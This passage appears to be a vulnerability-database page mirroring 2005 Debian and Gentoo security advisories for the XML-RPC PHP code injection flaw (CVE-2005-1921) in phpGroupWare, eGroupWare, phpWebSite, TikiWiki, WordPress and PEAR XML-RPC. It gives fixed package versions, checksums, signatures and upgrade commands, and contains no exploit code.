    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-bookmarks_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   100516 67d9c3435e6b55f7f5961772267ca1ad
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-developer-tools_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    32896 1e2af590a4887c3ba471930d6eb99128
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-skel_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    18770 1c69b89be7e3cdf5003b3d6e4b7eb1d8
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-calendar_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   323552 22390645056bcb021c2e608644f4f591
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-folders_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   166002 f7a6ba93175803e7de9517698397cb90
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-etemplate_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:  1328904 4c2982ec97a5b08f6d2d83fafbdbbe43
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-felamimail_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   179716 0706f78f53596f7adeddda57a6977a09
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-filemanager_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    91192 f49356e1ba4540c657ff64ebbca6ce62
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-todo_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    49828 3001c35e7b6780a063a1c6dc74a7785d
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-projects_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   119876 21d5eb594517b56f348186189292a0dc
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-xmlrpc_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    62508 922fe6644df12d786b2500eb07bd5523
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-email_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:  1117384 b7f5819fed77a668023204786ec00d68
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-comic_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   433776 0ddc8573dff45912049bb3c516889f4c
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-dj_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    42338 4a17fcf60a2575be7182ffa780a7eb0e
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-setup_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   266852 2e05a4e8f1dea399e5b8ddc99322d2d1
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-stocks_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    21542 2beb7d5a99acdc2a33c8fe672574d025
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-core_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:     6092 cb1f96251a63d5fadba172f648f7f909
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-hr_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    18390 95374052008b852fbea203d3f6fd1d75
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   155778 b1e8dc55d9e5a4ed9d868750957babb7
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-headlines_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    63476 3bc0223e4550a7a56295017885f07998
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-phpsysinfo_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   116012 bdffce5b093fb41e0429a7d4eee8ea93
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-img_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:     8272 f4649ebb3b674661a1a172d1f503a673
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-eldaptir_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    49984 0ba721f8a669b6b6338ae90c7bb9070f
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-messenger_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    25578 461e9804f5ce01b332cbe6569529bdc9
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-soap_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    23596 2e3454fa36009152beb0695c80a238ec
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-forum_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    45118 996eebff648f4b688403cfb00255b924
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-manual_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    90172 2196aa43de438b0a5d3754ba0b4f8089
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-qmailldap_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    23050 02ed1690b4d3547dbbcfe8145d234062
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-tts_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    55322 9f8ddccce78aa7ac488d6bd965bb2732
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-notes_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    34538 0de0c8c676a0e1efca8845c78d0ae201
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-polls_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    31116 2b7e22a553c0bc0457757993dda7cfe8

- -------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iQCVAwUBQtW8Wg0hVr09l8FJAQK5JQP/SVcL2ww+8zgxzUgT3MqEAv6kZVu12S7T
Z9viSjPPoaUcSNm4OJnxF1gLlm6iTf6om77hJY54Uxx1Izl+50IT7Gj/qEwZTH2K
CZyggChONLcqRvh0D0/2CNx787qO+PnqkJFC6Ij6be9Ex1bK+cpBhfy5yO1oWX+V
KUj+1lyGHPY=
=L7Ey
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F38596)

Gentoo Linux Security Advisory 200507-8 (PacketStormID:F38596)
2005-07-12 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-1921
[点击下载]

Gentoo Linux Security Advisory GLSA 200507-08 - The XML-RPC implementations of phpGroupWare and eGroupWare fail to sanitize input sent to the XML-RPC server using the POST method. Versions less than 0.9.16.006 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200507-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: phpGroupWare, eGroupWare: PHP script injection
            vulnerability
      Date: July 10, 2005
      Bugs: #97460, #97651
        ID: 200507-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

phpGroupWare and eGroupWare include an XML-RPC implementation which
allows remote attackers to execute arbitrary PHP script commands.

Background
==========

phpGroupWare and eGroupWare are web based collaboration software
suites.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /   Vulnerable   /              Unaffected
    -------------------------------------------------------------------
  1  www-apps/phpgroupware     < 0.9.16.006              >= 0.9.16.006
  2  www-apps/egroupware        < 1.0.0.008               >= 1.0.0.008
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

The XML-RPC implementations of phpGroupWare and eGroupWare fail to
sanitize input sent to the XML-RPC server using the "POST" method.

Impact
======

A remote attacker could exploit the XML-RPC vulnerability to execute
arbitrary PHP script code by sending specially crafted XML data to the
XML-RPC servers of phpGroupWare or eGroupWare.

Workaround
==========

There are no known workarounds at this time.

Resolution
==========

All phpGroupWare users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-app/phpgroupware-0.9.16.006"

All eGroupWare users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-app/egroupware-1.0.0.008"

References
==========

  [ 1 ] CAN-2005-1921
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1921

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200507-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

    

- 漏洞信息 (F38593)

Debian Linux Security Advisory 747-1 (PacketStormID:F38593)
2005-07-12 00:00:00
Debian  security.debian.org
advisory,arbitrary
linux,debian
CVE-2005-1921
[点击下载]

Debian Security Advisory DSA 747-1 - A vulnerability has been identified in the xmlrpc library included in the egroupware package. This vulnerability could lead to the execution of arbitrary commands on the server running egroupware.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA 747-1                   security@debian.org
http://www.debian.org/security/                            Michael Stone
July 10, 2005                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : egroupware
Vulnerability  : remote command execution
Problem type   : input validation error
Debian-specific: no
CVE Id(s)      : CAN-2005-1921

A vulernability has been identified in the xmlrpc library included in
the egroupware package. This vulnerability could lead to the execution
of arbitrary commands on the server running egroupware.

The old stable distribution (woody) did not include egroupware.

For the current stable distribution (sarge), this problem is fixed in
version 1.0.0.007-2.dfsg-2sarge1.

For the unstable distribution (sid), this problem is fixed in version
1.0.0.007-3.dfsg-1.

We recommend that you upgrade your egroupware package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 3.1 (sarge)
- ------------------

  sarge was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

  Source archives:

    http://security.debian.org/pool/updates/main/e/egroupware/egroupware_1.0.0.007-2.dfsg.orig.tar.gz
      Size/MD5 checksum: 12699187 462f5ea377c4d0c04f16ffe8037b9d6a
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware_1.0.0.007-2.dfsg-2sarge1.diff.gz
      Size/MD5 checksum:    33321 2ae91aca7f89d1f3d5f725fa09384ed8
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware_1.0.0.007-2.dfsg-2sarge1.dsc
      Size/MD5 checksum:     1285 1849e8a4639068df7ac9f8f72272ef86

  Architecture independent packages:

    http://security.debian.org/pool/updates/main/e/egroupware/egroupware_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:     4212 6edb07699896314d8c0ce641e2228cc5
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-forum_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    51144 e611af77c5bd0c4b75cd9227ca50e115
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-ftp_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    37840 78e388f8967593e544992cc18fc47096
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-sitemgr_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   486306 ff7956754ab17b48938bc290171ab6c6
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-jinn_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   204810 0f4c3f9ce74980dc5102bbabb2909b49
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-stocks_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    26322 88c9d54ae0e23842f0b59b3cdc3de55f
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-news-admin_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    50530 d9407cff76325b2e597d30b16b55f35b
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-emailadmin_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    37916 a0c6fc6f8c2138e8377dc24933a45772
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-addressbook_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   148770 d96b5a43c0a29dd8dbc13d001831a45c
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-phpsysinfo_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   115750 d94de6dbaf9135a6fb45a1f01ffc09f4
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-manual_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    17100 2b837171f92886b79dab136b4cbed1b0
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-filemanager_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   172670 e35d2a3af12432147711a39e31d0a194
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-tts_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    92442 a1e6eacb42d3cf26bc2fe22086ee2332
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-comic_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   255838 b00219a9f18f65b56cde18564dbcdfc6
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-fudforum_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:  1486218 7b8b470bf2a5f2279a322723ff74d031
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-infolog_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   202082 ef4836ce08f0edfba3d7d2dee6f13225
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-bookmarks_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   124930 bfdacc1755efb6e43133808bf77a1200
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-phpbrain_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   119060 6588409cc9526dca31479a4d1a464cb6
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-core_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:  3771642 078dcb7065c3ced38e7e837d15003dde
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-messenger_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    31966 3f1306aa4e31ce8518a967d5b6c8de23
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-etemplate_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:  1363034 bdc3797f41136a032488e458e090b729
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-calendar_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   382010 4725c5ad39c9abf8ab116f8a5dd0bb57
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-headlines_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    74732 2a08f46a7af3a0084426e317ffacf083
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-ldap_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:     6942 2504ff9fa488181edfd5484ebab583b0
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-wiki_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    92404 18e426330d98178d6acf7b1f04e7a616
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-email_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:  1243590 14104d7117c1ddcfe4013e64cdf4f427
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-projects_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   302036 275669f1b8eae13a4fa091423506aa65
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-phpldapadmin_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   139354 664038c40ad93e64daf975e5e50d3550
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-felamimail_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:   275144 361b4166509e4dd861c907c2f9f846f5
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-polls_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    35878 069b89e524f57fff58dfa91e19380ee0
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-registration_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    99618 264116d3f03eddeae48e2ac1b5e74bb0
    http://security.debian.org/pool/updates/main/e/egroupware/egroupware-developer-tools_1.0.0.007-2.dfsg-2sarge1_all.deb
      Size/MD5 checksum:    53220 de815addc18f090c263b582db7025af3

- -------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iQCVAwUBQtFdYg0hVr09l8FJAQJn5QP/W3BxmQKGz9C7u9zG7G9kTgO8lmZSy99E
98nwM3puUkDU5na4Mx3OSiNJ/RsNP/8PwwRVhX/CCQ8n4e+BloX9zCfY1TGFKZI9
BYFU00zrRGjOXyJ0ulHtIhaXcLiGJsxvfVcC5jQkvuzJhqirewc24uZu3gmoEJw7
7l4KF2r8Gts=
=rdLU
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F38573)

Gentoo Linux Security Advisory 200507-7 (PacketStormID:F38573)
2005-07-12 00:00:00
Gentoo  security.gentoo.org
advisory,vulnerability
linux,gentoo
CVE-2005-1921
[点击下载]

Gentoo Linux Security Advisory GLSA 200507-07 - phpWebSite fails to sanitize input sent to the XML-RPC server using the POST method. Other unspecified vulnerabilities have been discovered by Diabolic Crab of Hackers Center. Versions less than 0.10.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200507-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: phpWebSite: Multiple vulnerabilities
      Date: July 10, 2005
      Bugs: #97461
        ID: 200507-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

phpWebSite is vulnerable to the remote execution of arbitrary PHP
script code and to other, yet undisclosed, vulnerabilities.

Background
==========

phpWebSite is a content management system written in PHP.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /   Vulnerable   /                Unaffected
    -------------------------------------------------------------------
  1  www-apps/phpwebsite      < 0.10.1-r1                 >= 0.10.1-r1

Description
===========

phpWebSite fails to sanitize input sent to the XML-RPC server using the
"POST" method. Other unspecified vulnerabilities have been discovered
by Diabolic Crab of Hackers Center.

Impact
======

A remote attacker could exploit the XML-RPC vulnerability to execute
arbitrary PHP script code by sending specially crafted XML data to
phpWebSite. The undisclosed vulnerabilities do have an unknown impact.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All phpWebSite users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-app/phpwebsite-0.10.1-r1"

References
==========

  [ 1 ] CAN-2005-1921
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1921
  [ 2 ] phpWebSite announcement
        http://phpwebsite.appstate.edu/index.php?module=announce&ANN_user_op=view&ANN_id=989

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200507-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

    

- 漏洞信息 (F38511)

Gentoo Linux Security Advisory 200507-6 (PacketStormID:F38511)
2005-07-07 00:00:00
Gentoo  security.gentoo.org
advisory,arbitrary
linux,gentoo
CVE-2005-1921
[点击下载]

Gentoo Linux Security Advisory GLSA 200507-06 - TikiWiki is vulnerable to arbitrary command execution as described in GLSA 200507-01. Versions less than 1.8.5-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200507-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: TikiWiki: Arbitrary command execution through XML-RPC
      Date: July 06, 2005
      Bugs: #97648
        ID: 200507-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

TikiWiki includes PHP XML-RPC code, making it vulnerable to arbitrary
command execution.

Background
==========

TikiWiki is a web-based groupware and content management system (CMS),
using PHP, ADOdb and Smarty. TikiWiki includes vulnerable PHP XML-RPC
code.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  www-apps/tikiwiki     < 1.8.5-r1                      >= 1.8.5-r1

Description
===========

TikiWiki is vulnerable to arbitrary command execution as described in
GLSA 200507-01.

Impact
======

A remote attacker could exploit this vulnerability to execute arbitrary
PHP code by sending specially crafted XML data.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All TikiWiki users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/tikiwiki-1.8.5-r1"

References
==========

  [ 1 ] GLSA 200507-01
        http://security.gentoo.org/glsa/glsa-200507-01.xml
  [ 2 ] CAN-2005-1921
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1921

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200507-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
    

- 漏洞信息 (F38490)

Gentoo Linux Security Advisory 200507-2 (PacketStormID:F38490)
2005-07-07 00:00:00
Gentoo  security.gentoo.org
advisory,vulnerability,xss
linux,gentoo
CVE-2005-1921
[点击下载]

Gentoo Linux Security Advisory GLSA 200507-02 - James Bercegay of the GulfTech Security Research Team discovered that WordPress insufficiently checks data passed to the XML-RPC server. He also discovered that WordPress has several cross-site scripting and full path disclosure vulnerabilities. Versions less than 1.5.1.3 are affected.

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig3B3701301AD3DE4BFDA55674
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200507-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: WordPress: Multiple vulnerabilities
      Date: July 04, 2005
      Bugs: #97374
        ID: 200507-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

WordPress contains PHP script injection, cross-site scripting and path
disclosure vulnerabilities.

Background
==========

WordPress is a PHP and MySQL based content management and publishing
system.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-apps/wordpress      < 1.5.1.3                      >= 1.5.1.3

Description
===========

James Bercegay of the GulfTech Security Research Team discovered that
WordPress insufficiently checks data passed to the XML-RPC server. He
also discovered that WordPress has several cross-site scripting and
full path disclosure vulnerabilities.

Impact
======

An attacker could use the PHP script injection vulnerabilities to
execute arbitrary PHP script commands. Furthermore the cross-site
scripting vulnerabilities could be exploited to execute arbitrary
script code in a user's browser session in context of a vulnerable
site.

Workaround
==========

There are no known workarounds at this time.

Resolution
==========

All WordPress users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/wordpress-1.5.1.3"

References
==========

  [ 1 ] CAN-2005-1921
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1921
  [ 2 ] GulfTech Advisory
        http://www.gulftech.org/?node=research&article_id=00085-06282005

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200507-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


--------------enig3B3701301AD3DE4BFDA55674
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCyTOVvcL1obalX08RAo37AJ9Ayht6o6UYJGv4Cs3fDdOC1vFcGQCfbife
Cb3IOWjllMu4j83RV9DYDec=
=+v1x
-----END PGP SIGNATURE-----

--------------enig3B3701301AD3DE4BFDA55674--
    

- 漏洞信息 (F38488)

Gentoo Linux Security Advisory 200507-1 (PacketStormID:F38488)
2005-07-07 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-1921
[点击下载]

Gentoo Linux Security Advisory GLSA 200507-01 - James Bercegay of GulfTech Security Research discovered that the PEAR XML-RPC and phpxmlrpc libraries fail to sanitize input sent using the POST method. Versions less than 1.3.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200507-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: PEAR XML-RPC, phpxmlrpc: PHP script injection vulnerability
      Date: July 03, 2005
      Bugs: #97399, #97629
        ID: 200507-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The PEAR XML-RPC and phpxmlrpc libraries allow remote attackers to
execute arbitrary PHP script commands.

Background
==========

The PEAR XML-RPC and phpxmlrpc libraries are both PHP implementations
of the XML-RPC protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  dev-php/PEAR-XML_RPC       < 1.3.1                       >= 1.3.1
  2  dev-php/phpxmlrpc          < 1.1.1                       >= 1.1.1
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

James Bercegay of GulfTech Security Research discovered that the PEAR
XML-RPC and phpxmlrpc libraries fail to sanatize input sent using the
"POST" method.

Impact
======

A remote attacker could exploit this vulnerability to execute arbitrary
PHP script code by sending a specially crafted XML document to web
applications making use of these libraries.

Workaround
==========

There are no known workarounds at this time.

Resolution
==========

All PEAR-XML_RPC users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-php/PEAR-XML_RPC-1.3.1"

All phpxmlrpc users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-php/phpxmlrpc-1.1.1"

References
==========

  [ 1 ] CAN-2005-1921
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1921
  [ 2 ] GulfTech Advisory
        http://www.gulftech.org/?node=research&article_id=00088-07022005

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200507-01.xml

Concerns?
=========

